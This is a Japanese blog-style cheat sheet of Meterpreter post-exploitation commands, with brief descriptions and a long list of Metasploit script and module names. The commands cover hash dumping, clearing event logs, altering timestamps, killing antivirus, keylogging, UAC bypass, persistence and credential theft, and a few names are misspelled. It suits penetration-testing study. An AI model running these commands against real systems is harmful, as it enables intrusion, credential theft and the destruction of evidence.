meterpreterの使えるコマンドということで、まとめていく
随時更新していく予定。
・sysinfo
システム情報取得
・ipconfig
使い方は、dosコマンドと一緒
・ps
プロセス一覧取得
・getuid
ユーザーの確認
・getsystem
権限昇格を試みる
オプションなしでは複数の方法を試行する
・getuid
ユーザーの確認
・getprivs
有効な特権の確認
・hashdup
パスワードハッシュの取得
取得できたハッシュは、johnで解析
・upload ファイル名
ファイルを攻撃対象にアップロード
・download ファイル名
攻撃対象のファイルを自ホストにダウンロード
・timestomp ファイル名 -z "01/01/2005 00:00:00"
ファイルのタイムスタンプ変更
・screenshot
Metasploitを実行しているマシンのブラウザでjpegファイルが表示される
・ clearev
イベントログの削除
・excute ファイル名
実行ファイルを実行できる。
・run
runと入力して、tabキーを3回押すと実行可能なmeterpreterスクリプトの一覧が表示される。
・run checkvm
仮想環境かチェック
・run killav
アンチウイルスを終了する
・run getgui -e
リモートデスクトップを有効にする
・run keylogrecorder
キーロガーの実行
・run packetrecoder
パケットキャプチャーの実行
runのスクリプト一覧
スクリプト名読めば大体理解できるから大丈夫ってことにしとく
run arp_scanner
run autoroute
run checkvm
run credcollect
run domain_list_gen
run dumplinks
run duplicate
run enum_chrome
run enum_firefox
run enum_logged_on_users
run enum_powershell_env
run enum_putty
run enum_shares
run enum_vmware
run event_manager
run powerdump
run prefetchtool
run process_memdump
run remotewinenum
run scheduleme
run schelevator
run schtasksabuse
run scraper
run screen_unlock
run screenspy
run search_dwld
run service_manager
run service_permissions_escalate
run sound_recorder
run srt_webdrive_priv
run uploadexec
run virtualbox_sysenter_dos
run virusscan_bypass
run vnc
run webcam
run winbf
run winenum
run wmic
run exploit/windows/local/adobe_sandbox_adobecollabsync
run exploit/windows/local/agnitum_outpost_acs
run exploit/windows/local/alpc_taskscheduler
run exploit/windows/local/always_install_elevated
run exploit/windows/local/anyconnect_lpe
run exploit/windows/local/applocker_bypass
run exploit/windows/local/appxsvc_hard_link_privesc
run exploit/windows/local/ask
run exploit/windows/local/bits_ntlm_token_impersonation
run exploit/windows/local/bthpan
run exploit/windows/local/bypassuac
run exploit/windows/local/bypassuac_comhijack
run exploit/windows/local/bypassuac_dotnet_profiler
run exploit/windows/local/bypassuac_eventvwr
run exploit/windows/local/bypassuac_fodhelper
run exploit/windows/local/bypassuac_injection
run exploit/windows/local/bypassuac_injection_winsxs
run exploit/windows/local/bypassuac_sdclt
run exploit/windows/local/bypassuac_silentcleanup
run exploit/windows/local/bypassuac_sluihijack
run exploit/windows/local/bypassuac_vbs
run exploit/windows/local/bypassuac_windows_store_filesys
run exploit/windows/local/bypassuac_windows_store_reg
run exploit/windows/local/capcom_sys_exec
run exploit/windows/local/comahawk
run exploit/windows/local/current_user_psexec
run exploit/windows/local/cve_2017_8464_lnk_lpe
run exploit/windows/local/cve_2018_8453_win32k_priv_esc
run exploit/windows/local/cve_2019_1458_wizardopium
run exploit/windows/local/cve_2020_0668_service_tracing
run exploit/windows/local/cve_2020_0787_bits_arbitrary_file_move
run exploit/windows/local/cve_2020_0796_smbghost
run exploit/windows/local/cve_2020_1048_printerdemon
run exploit/windows/local/cve_2020_1054_drawiconex_lpe
run exploit/windows/local/cve_2020_1313_system_orchestrator
run exploit/windows/local/cve_2020_1337_printerdemon
run exploit/windows/local/cve_2020_17136
run exploit/windows/local/cve_2021_1732_win32k
run exploit/windows/local/cve_2021_21551_dbutil_memmove
run exploit/windows/local/dnsadmin_serverlevelplugindll
run exploit/windows/local/docker_credential_wincred
run exploit/windows/local/druva_insync_insynccphwnet64_rcp_type_5_priv_esc
run exploit/windows/local/gog_galaxyclientservice_privesc
run exploit/windows/local/ikeext_service
run exploit/windows/local/ipass_launch_app
run exploit/windows/local/lenovo_systemupdate
run exploit/windows/local/microfocus_operations_privesc
run exploit/windows/local/mov_ss
run exploit/windows/local/mqac_write
run exploit/windows/local/ms10_015_kitrap0d
run exploit/windows/local/ms10_092_schelevator
run exploit/windows/local/ms11_080_afdjoinleaf
run exploit/windows/local/ms13_005_hwnd_broadcast
run exploit/windows/local/ms13_053_schlamperei
run exploit/windows/local/ms13_081_track_popup_menu
run exploit/windows/local/ms13_097_ie_registry_symlink
run exploit/windows/local/ms14_009_ie_dfsvc
run exploit/windows/local/ms14_058_track_popup_menu
run exploit/windows/local/ms14_070_tcpip_ioctl
run exploit/windows/local/ms15_004_tswbproxy
run exploit/windows/local/ms15_051_client_copy_image
run exploit/windows/local/ms15_078_atmfd_bof
run exploit/windows/local/ms16_014_wmi_recv_notif
run exploit/windows/local/ms16_016_webdav
run exploit/windows/local/ms16_032_secondary_logon_handle_privesc
run exploit/windows/local/ms16_075_reflection
run exploit/windows/local/ms16_075_reflection_juicy
run exploit/windows/local/ms18_8120_win32k_privesc
run exploit/windows/local/ms_ndproxy
run exploit/windows/local/novell_client_nicm
run exploit/windows/local/novell_client_nwfs
run exploit/windows/local/nscp_pe
run exploit/windows/local/ntapphelpcachecontrol
run exploit/windows/local/ntusermndragover
run exploit/windows/local/nvidia_nvsvc
run exploit/windows/local/panda_psevents
run exploit/windows/local/payload_inject
run exploit/windows/local/persistence
run exploit/windows/local/persistence_image_exec_options
run exploit/windows/local/persistence_service
run exploit/windows/local/plantronics_hub_spokesupdateservice_privesc
run exploit/windows/local/powershell_cmd_upgrade
run exploit/windows/local/powershell_remoting
run exploit/windows/local/ppr_flatten_rec
run exploit/windows/local/ps_persist
run exploit/windows/local/ps_wmi_exec
run exploit/windows/local/pxeexploit
run exploit/windows/local/razer_zwopenprocess
run exploit/windows/local/registry_persistence
run exploit/windows/local/ricoh_driver_privesc
run exploit/windows/local/run_as
run exploit/windows/local/s4u_persistence
run exploit/windows/local/service_permissions
run exploit/windows/local/srclient_dll_hijacking
run exploit/windows/local/tokenmagic
run exploit/windows/local/unquoted_service_path
run exploit/windows/local/virtual_box_guest_additions
run exploit/windows/local/virtual_box_opengl_escape
run exploit/windows/local/vss_persistence
run exploit/windows/local/webexec
run exploit/windows/local/windscribe_windscribeservice_priv_esc
run exploit/windows/local/wmi
run exploit/windows/local/wmi_persistence
run file_collector
run get_application_list
run get_env
run get_filezilla_creds
run get_local_subnets
run get_pidgin_creds
run get_valid_community
run getcountermeasure
run getgui
run gettelnet
run getvncpw
run hashdump
run hostsedit
run keylogrecorder
run killav
run metsvc
run migrate
run multi_console_command
run multi_meter_inject
run multicommand
run multiscript
run netenum
run packetrecorder
run panda_2007_pavsrv51
run persistence
run pml_driver_config
run post/aix/hashdump
run post/android/capture/screen
run post/android/gather/hashdump
run post/android/gather/sub_info
run post/android/gather/wireless_ap
run post/android/local/koffee
run post/android/manage/remove_lock
run post/android/manage/remove_lock_root
run post/apple_ios/gather/ios_image_gather
run post/apple_ios/gather/ios_text_gather
run post/bsd/gather/hashdump
run post/firefox/gather/cookies
run post/firefox/gather/history
run post/firefox/gather/passwords
run post/firefox/gather/xss
run post/firefox/manage/webcam_chat
run post/hardware/automotive/can_flood
run post/hardware/automotive/canprobe
run post/hardware/automotive/getvinfo
run post/hardware/automotive/identifymodules
run post/hardware/automotive/malibu_overheat
run post/hardware/automotive/mazda_ic_mover
run post/hardware/automotive/pdt
run post/hardware/rftransceiver/rfpwnon
run post/hardware/rftransceiver/transmitter
run post/hardware/zigbee/zstumbler
run post/linux/busybox/enum_connections
run post/linux/busybox/enum_hosts
run post/linux/busybox/jailbreak
run post/linux/busybox/ping_net
run post/linux/busybox/set_dmz
run post/linux/busybox/set_dns
run post/linux/busybox/smb_share_root
run post/linux/busybox/wget_exec
run post/linux/dos/xen_420_dos
run post/linux/gather/checkcontainer
run post/linux/gather/checkvm
run post/linux/gather/ecryptfs_creds
run post/linux/gather/enum_commands
run post/linux/gather/enum_configs
run post/linux/gather/enum_containers
run post/linux/gather/enum_nagios_xi
run post/linux/gather/enum_network
run post/linux/gather/enum_protections
run post/linux/gather/enum_psk
run post/linux/gather/enum_system
run post/linux/gather/enum_users_history
run post/linux/gather/gnome_commander_creds
run post/linux/gather/gnome_keyring_dump
run post/linux/gather/haserl_read
run post/linux/gather/hashdump
run post/linux/gather/mount_cifs_creds
run post/linux/gather/openvpn_credentials
run post/linux/gather/phpmyadmin_credsteal
run post/linux/gather/pptpd_chap_secrets
run post/linux/gather/tor_hiddenservices
run post/linux/manage/dns_spoofing
run post/linux/manage/download_exec
run post/linux/manage/iptables_removal
run post/linux/manage/pseudo_shell
run post/linux/manage/sshkey_persistence
run post/multi/escalate/aws_create_iam_user
run post/multi/escalate/cups_root_file_read
run post/multi/escalate/metasploit_pcaplog
run post/multi/gather/apple_ios_backup
run post/multi/gather/aws_ec2_instance_metadata
run post/multi/gather/aws_keys
run post/multi/gather/check_malware
run post/multi/gather/chrome_cookies
run post/multi/gather/dbvis_enum
run post/multi/gather/dns_bruteforce
run post/multi/gather/dns_reverse_lookup
run post/multi/gather/dns_srv_lookup
run post/multi/gather/docker_creds
run post/multi/gather/enum_hexchat
run post/multi/gather/enum_software_versions
run post/multi/gather/enum_vbox
run post/multi/gather/env
run post/multi/gather/fetchmailrc_creds
run post/multi/gather/filezilla_client_cred
run post/multi/gather/find_vmx
run post/multi/gather/firefox_creds
run post/multi/gather/gpg_creds
run post/multi/gather/grub_creds
run post/multi/gather/irssi_creds
run post/multi/gather/jboss_gather
run post/multi/gather/jenkins_gather
run post/multi/gather/lastpass_creds
run post/multi/gather/maven_creds
run post/multi/gather/multi_command
run post/multi/gather/netrc_creds
run post/multi/gather/pgpass_creds
run post/multi/gather/pidgin_cred
run post/multi/gather/ping_sweep
run post/multi/gather/remmina_creds
run post/multi/gather/resolve_hosts
run post/multi/gather/rsyncd_creds
run post/multi/gather/rubygems_api_key
run post/multi/gather/run_console_rc_file
run post/multi/gather/saltstack_salt
run post/multi/gather/skype_enum
run post/multi/gather/ssh_creds
run post/multi/gather/thunderbird_creds
run post/multi/gather/tomcat_gather
run post/multi/gather/ubiquiti_unifi_backup
run post/multi/gather/unix_cached_ad_hashes
run post/multi/gather/unix_kerberos_tickets
run post/multi/gather/wlan_geolocate
run post/multi/general/close
run post/multi/general/execute
run post/multi/general/wall
run post/multi/manage/autoroute
run post/multi/manage/dbvis_add_db_admin
run post/multi/manage/dbvis_query
run post/multi/manage/hsts_eraser
run post/multi/manage/multi_post
run post/multi/manage/open
run post/multi/manage/play_youtube
run post/multi/manage/record_mic
run post/multi/manage/screensaver
run post/multi/manage/screenshare
run post/multi/manage/set_wallpaper
run post/multi/manage/shell_to_meterpreter
run post/multi/manage/sudo
run post/multi/manage/system_session
run post/multi/manage/upload_exec
run post/multi/manage/zip
run post/multi/recon/local_exploit_suggester
run post/multi/recon/multiport_egress_traffic
run post/multi/recon/sudo_commands
run post/multi/sap/smdagent_get_properties
run exploit/multi/local/allwinner_backdoor
run exploit/multi/local/magnicomp_sysinfo_mcsiwrapper_priv_esc
run exploit/multi/local/xorg_x11_suid_server
run exploit/multi/local/xorg_x11_suid_server_modulepath
run post/networking/gather/enum_brocade
run post/networking/gather/enum_cisco
run post/networking/gather/enum_f5
run post/networking/gather/enum_juniper
run post/networking/gather/enum_mikrotik
run post/networking/gather/enum_vyos
run post/windows/capture/keylog_recorder
run post/windows/capture/lockout_keylogger
run post/windows/escalate/droplnk
run post/windows/escalate/getsystem
run post/windows/escalate/golden_ticket
run post/windows/escalate/ms10_073_kbdlayout
run post/windows/escalate/screen_unlock
run post/windows/escalate/unmarshal_cmd_exec
run post/windows/gather/ad_to_sqlite
run post/windows/gather/arp_scanner
run post/windows/gather/avast_memory_dump
run post/windows/gather/bitcoin_jacker
run post/windows/gather/bitlocker_fvek
run post/windows/gather/bloodhound
run post/windows/gather/cachedump
run post/windows/gather/checkvm
run post/windows/gather/credentials/avira_password
run post/windows/gather/credentials/bulletproof_ftp
run post/windows/gather/credentials/coreftp
run post/windows/gather/credentials/credential_collector
run post/windows/gather/credentials/domain_hashdump
run post/windows/gather/credentials/dynazip_log
run post/windows/gather/credentials/dyndns
run post/windows/gather/credentials/enum_cred_store
run post/windows/gather/credentials/enum_laps
run post/windows/gather/credentials/enum_picasa_pwds
run post/windows/gather/credentials/epo_sql
run post/windows/gather/credentials/filezilla_server
run post/windows/gather/credentials/flashfxp
run post/windows/gather/credentials/ftpnavigator
run post/windows/gather/credentials/ftpx
run post/windows/gather/credentials/gpp
run post/windows/gather/credentials/heidisql
run post/windows/gather/credentials/idm
run post/windows/gather/credentials/imail
run post/windows/gather/credentials/imvu
run post/windows/gather/credentials/mcafee_vse_hashdump
run post/windows/gather/credentials/mdaemon_cred_collector
run post/windows/gather/credentials/meebo
run post/windows/gather/credentials/mremote
run post/windows/gather/credentials/mssql_local_hashdump
run post/windows/gather/credentials/nimbuzz
run post/windows/gather/credentials/outlook
run post/windows/gather/credentials/pulse_secure
run post/windows/gather/credentials/purevpn_cred_collector
run post/windows/gather/credentials/razer_synapse
run post/windows/gather/credentials/razorsql
run post/windows/gather/credentials/rdc_manager_creds
run post/windows/gather/credentials/securecrt
run post/windows/gather/credentials/skype
run post/windows/gather/credentials/smartermail
run post/windows/gather/credentials/smartftp
run post/windows/gather/credentials/spark_im
run post/windows/gather/credentials/sso
run post/windows/gather/credentials/steam
run post/windows/gather/credentials/teamviewer_passwords
run post/windows/gather/credentials/tortoisesvn
run post/windows/gather/credentials/total_commander
run post/windows/gather/credentials/trillian
run post/windows/gather/credentials/vnc
run post/windows/gather/credentials/windows_autologin
run post/windows/gather/credentials/winscp
run post/windows/gather/credentials/wsftp_client
run post/windows/gather/credentials/xshell_xftp_password
run post/windows/gather/dnscache_dump
run post/windows/gather/dumplinks
run post/windows/gather/enum_ad_bitlocker
run post/windows/gather/enum_ad_computers
run post/windows/gather/enum_ad_groups
run post/windows/gather/enum_ad_managedby_groups
run post/windows/gather/enum_ad_service_principal_names
run post/windows/gather/enum_ad_to_wordlist
run post/windows/gather/enum_ad_user_comments
run post/windows/gather/enum_ad_users
run post/windows/gather/enum_applications
run post/windows/gather/enum_artifacts
run post/windows/gather/enum_av_excluded
run post/windows/gather/enum_chrome
run post/windows/gather/enum_computers
run post/windows/gather/enum_db
run post/windows/gather/enum_devices
run post/windows/gather/enum_dirperms
run post/windows/gather/enum_domain
run post/windows/gather/enum_domain_group_users
run post/windows/gather/enum_domain_tokens
run post/windows/gather/enum_domain_users
run post/windows/gather/enum_domains
run post/windows/gather/enum_emet
run post/windows/gather/enum_files
run post/windows/gather/enum_hostfile
run post/windows/gather/enum_hyperv_vms
run post/windows/gather/enum_ie
run post/windows/gather/enum_logged_on_users
run post/windows/gather/enum_ms_product_keys
run post/windows/gather/enum_muicache
run post/windows/gather/enum_onedrive
run post/windows/gather/enum_patches
run post/windows/gather/enum_powershell_env
run post/windows/gather/enum_prefetch
run post/windows/gather/enum_proxy
run post/windows/gather/enum_putty_saved_sessions
run post/windows/gather/enum_services
run post/windows/gather/enum_shares
run post/windows/gather/enum_snmp
run post/windows/gather/enum_termserv
run post/windows/gather/enum_tokens
run post/windows/gather/enum_tomcat
run post/windows/gather/enum_trusted_locations
run post/windows/gather/enum_unattend
run post/windows/gather/exchange
run post/windows/gather/file_from_raw_ntfs
run post/windows/gather/forensics/browser_history
run post/windows/gather/forensics/duqu_check
run post/windows/gather/forensics/enum_drives
run post/windows/gather/forensics/fanny_bmp_check
run post/windows/gather/forensics/imager
run post/windows/gather/forensics/nbd_server
run post/windows/gather/forensics/recovery_files
run post/windows/gather/hashdump
run post/windows/gather/local_admin_search_enum
run post/windows/gather/lsa_secrets
run post/windows/gather/make_csv_orgchart
run post/windows/gather/memory_dump
run post/windows/gather/memory_grep
run post/windows/gather/netlm_downgrade
run post/windows/gather/ntds_grabber
run post/windows/gather/ntds_location
run post/windows/gather/outlook
run post/windows/gather/phish_windows_credentials
run post/windows/gather/psreadline_history
run post/windows/gather/resolve_sid
run post/windows/gather/reverse_lookup
run post/windows/gather/screen_spy
run post/windows/gather/smart_hashdump
run post/windows/gather/tcpnetstat
run post/windows/gather/usb_history
run post/windows/gather/win_privs
run post/windows/gather/wmic_command
run post/windows/gather/word_unc_injector
run post/windows/manage/add_user
run post/windows/manage/archmigrate
run post/windows/manage/change_password
run post/windows/manage/clone_proxy_settings
run post/windows/manage/delete_user
run post/windows/manage/download_exec
run post/windows/manage/driver_loader
run post/windows/manage/enable_rdp
run post/windows/manage/enable_support_account
run post/windows/manage/exec_powershell
run post/windows/manage/execute_dotnet_assembly
run post/windows/manage/forward_pageant
run post/windows/manage/hashcarve
run post/windows/manage/ie_proxypac
run post/windows/manage/inject_ca
run post/windows/manage/inject_host
run post/windows/manage/install_python
run post/windows/manage/install_ssh
run post/windows/manage/killav
run post/windows/manage/migrate
run post/windows/manage/mssql_local_auth_bypass
run post/windows/manage/multi_meterpreter_inject
run post/windows/manage/nbd_server
run post/windows/manage/peinjector
run post/windows/manage/persistence_exe
run post/windows/manage/portproxy
run post/windows/manage/powershell/build_net_code
run post/windows/manage/powershell/exec_powershell
run post/windows/manage/powershell/load_script
run post/windows/manage/pptp_tunnel
run post/windows/manage/priv_migrate
run post/windows/manage/pxeexploit
run post/windows/manage/reflective_dll_inject
run post/windows/manage/remove_ca
run post/windows/manage/remove_host
run post/windows/manage/rid_hijack
run post/windows/manage/rollback_defender_signatures
run post/windows/manage/rpcapd_start
run post/windows/manage/run_as
run post/windows/manage/run_as_psh
run post/windows/manage/sdel
run post/windows/manage/shellcode_inject
run post/windows/manage/sshkey_persistence
run post/windows/manage/sticky_keys
run post/windows/manage/vmdk_mount
run post/windows/manage/vss
run post/windows/manage/vss_create
run post/windows/manage/vss_list
run post/windows/manage/vss_mount
run post/windows/manage/vss_set_storage
run post/windows/manage/vss_storage
run post/windows/manage/wdigest_caching
run post/windows/manage/webcam
run post/windows/recon/computer_browser_discovery
run post/windows/recon/outbound_ports
run post/windows/recon/resolve_ip
run post/windows/wlan/wlan_bss_list
run post/windows/wlan/wlan_current_connection
run post/windows/wlan/wlan_disconnect
run post/windows/wlan/wlan_probe_request
run post/windows/wlan/wlan_profile
詳しくは、ここにチートシートがある。
https://www.blueliv.com/downloads/Meterpreter_cheat_sheet_v0.1.pdf